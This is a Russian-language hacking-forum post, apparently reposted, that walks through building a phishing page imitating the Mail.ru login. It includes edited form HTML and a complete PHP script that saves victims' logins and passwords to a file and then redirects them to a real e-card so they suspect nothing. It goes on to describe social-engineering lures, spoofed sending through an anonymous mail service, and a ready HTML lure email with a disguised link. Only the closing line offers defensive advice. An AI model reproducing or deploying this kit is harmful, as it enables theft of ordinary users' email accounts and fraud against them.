http://forum.benderbay.com/index.php?showtopic=851
Взято из всемирной паутины)
Готовый Фейк это конечно здорово, но фейк сделаный собственными руками намного лучше. Хоть всемирная паутина и переполнена готовыми фейками и с помощью Гугла хуть черта лысого найдешь , но все же решил написать статейку о том, как изготовить Фейк самостоятельно , даже если вы не знакомы ни с PHP ни с HTML . И так, для примера возьмем один из распространенных почтовиков, а иммено http://www.mail.ru и будем делать подложную страничку АВТОРИЗАЦИИ .
1. Создадим файл index.php :
Для этого запускаем браузер ( я буду работать в Opere). Идем по ссылке http://win.mail.ru/cgi-bin/login , перед вами загрузилась страница Авторизации .
Далее жмем – “Вид”, в ниспадающем меню выбираем строку “Исходный текст” – жмем. Перед вами открылось новое окно с человеконепонятным текстом гы-гы-гы)) Все нормально, нам это и нужно… Теперь в этом новом окне жмем “Правка”, затем жмем “Выделить все” опять жмем “Правка” и “Копировать”. Фух.. не надоело тыкать ? А мну надоело ((( Тогда открываем Блокнот и жмем Ctrl+V . Все, наш текст в блокноте приступим к его редактированию. Теперь нам необходимо найти следующую строку
Код:
<form method=”post” action=”auth” onSubmit=”return CheckForm(this);”>
и заменить
на
Код:
<form method=”post” action=”654321.php” onSubmit=”return CheckForm(this);”>
(подсказка: жмем Ctrl+H , далше собразите сами)
И стираем три строки кода в которых содержится hidden они распологаются ниже
вот они:
Код:
<input type=”hidden” name=”page” value=””>
<input type=”hidden” name=”post” value=””>
<input type=”hidden” name=”login_from” value=””>
Теперь сохраняем файл с именем index.php .
2. Теперь создадим скрипт отвечающий за запись переменных Login, Password и Domain – 654321.php
Открываем блокнот и создаем там файл со следующим содержанием:
Код:
<?PHP
$Login = $_POST[‘Login’];Логин
$Domain = $_POST[‘Domain’];//Домен
$Pass = $_POST[‘Password’];//Пароль
$c = “$Login@$Domain:$Pass”;
$fp = fopen(“654321?,”a+”); //открыть файл базы
fwrite($fp,”\n $c <br> \n”);//записываем все
fclose($fp); //закрываем
header(“Location: http://cards.mail.ru...cca05114e17f“);
echo “<META HTTP-EQUIV=\”Refresh\” content =\”0; URL=http://win.mail.ru/c...tart?1390370218\”>”//куда пошлем пользователя после того как он ввел данные!
?>
а пошлем мы его на заранее подготовленную открытку….этот момент очень важен, жертва не должна ничего заподозрить.
3. Теперь сздадим файл базы – 654321 куда будут сливатся Login, Password и Domain. Для этого открываем Блокнот и сохраняем пустую страничку с именем 654321.
Все фейк готов полностью осталось только залить его на хостинг и присвоить PHP скриптам права 755 , а файлу базы права 777.
Результат работы можете посмотреть сдесь:НАШ ФЕЙК
На этом пожалуй можно было бы и закончит статью…. Но думаю, что без примера, как заставить жертву зайти на подложную страничку, статья была бы не полной. Поэтому продолжу повествование.
И так, тут нам понадобиться вся мощь нашего серого вещества и немного Соц инженерии, а может и наоборот немного серого вещества и вся мощь Соц инженерии зы))). Первое что надо помнить, Жертва тоже человек, а значит думает так же как и Вы )))) гы-гы-гы)) ну почти как Вы))
а посему представте что вам приходит письмо от неизвестного человека. Вы будете смотреть ? Лично я нет… и от различных сомнительных сервисов тоже не буду. А значит писать надо от имени почтового сервиса на котором сидит жертва.. А что для этого нужно? А нужно изучить почтовый сервис icon_wink.gif?e176e6 какие рассылки он отправляет, какие услуги представляет, не плохо бы знать и о самом юзере (жертве) это сильно упростит задачу..мона просто прислать открытку к дню рождения от имени почтового сервиса.. это не вызывает подозрений…можно прислать приглашение на сайт знакомств, для парней от имени девушки , для девушек от имени парней (такое присутствует на mail.ru) …можно прислать, что угодно, но это должно быть интересное или от имени почтового сервиса на котором сидит жертва !!!! Вобщем тут думайте сами.. у вас есть на это голова))) Теперь о технической стороне .. для того , что бы отправить от имени почтового сервиса Вам прийдется воспользоватся анонимной отправкой почты таких сервисов полно в инете, к примеру можно воспользоватся вот этим http://never-mind.ru/sendmail/ . Письмо нужно составлять в html формате иначе вы не скроете ссылку на подложную страничку. Вобщем ближе к телу , как говорил Ги.Де. Мопасан, привожу пример письма для просмотра открытки, раз уж мы стали делать фейк на мейле.
Код:
<table class=readlet cellpadding=0 cellspacing=0 border=0 width=”100%”><tr>
<td>
<div id=let_body><base href=”http://win.mail.ru/cgi-bin/readmsg”><table cellspacing=0 cellpadding=5><tr valign=top>
<td><a href=”http://cards.mail.ru” target=”_blank”></a></td>
<td><font color=”#333333? face=”Arial” size=”2?>
Здравствуйте, на Ваше имя отправлена открытка.
Отправитель открытки: <a href=”http://cards.mail.ru/” target=”_blank” _base_href=”http://win.mail.ru/cgi-bin/readmsg”><font color=”#0857a6?>Открытки@Mail.Ru</font></a>
Открытку Вы можете посмотреть в течение 90 дней по ссылке
<a href=”http://priz.croe.net./” target=”_self”><font color=#0857A6>http://cards.mail.ru/card.html?cd=00dcfed993b461be466bcca05114e17f</font></a&gt;
Нажмите на неё, чтобы попасть на страницу с открыткой.
<hr align=”left” color=”silver” size=”1? width=”100%”>
Чтобы своевременно узнавать о ближайших праздниках, именинниках и конкурсах,
<a href=”http://content.mail....ages/p_782.html” target=”_blank” _base_href=”http://win.mail.ru/cgi-bin/readmsg”> подпишитесь на рассылку</a>.
<a href=”http://cards.mail.ru/” target=”_blank” _base_href=”http://win.mail.ru/cgi-bin/readmsg”><font color=”#0857a6?>Открытки@Mail.Ru</font></a> – открытки на все случаи жизни!<br><br><br>
</font></td></tr></table>
данный код вставляем в окно СООБЩЕНИЕ, в строке ОТ КОГО пишем Cards@mail.ru, в строке ТЕМА пишем ОТКРЫТКА и жмем отправить.
Не забудте только за ранее подготовить открытку , это важный момент !!!! Именно на нее мы будем отправлять жертву в файле 654321.php У жертвы не должно возникнуть сомнений, она должна получить то, что хотела увидеть и Вы должны увидеть то, что хотели гы-гы-гы )))
Ну вот и ВСЕ… хотя нет, забыл сказать о уязвимости… дабы самим не попастся, запомните единственное правило : ВСЕГДА ПРИ АВТОРИЗАЦИИ СМОТРИТЕ АДРЕСНУЮ СТРОКУ!!!!!!!! Подложный сайт можно увидеть только в ней.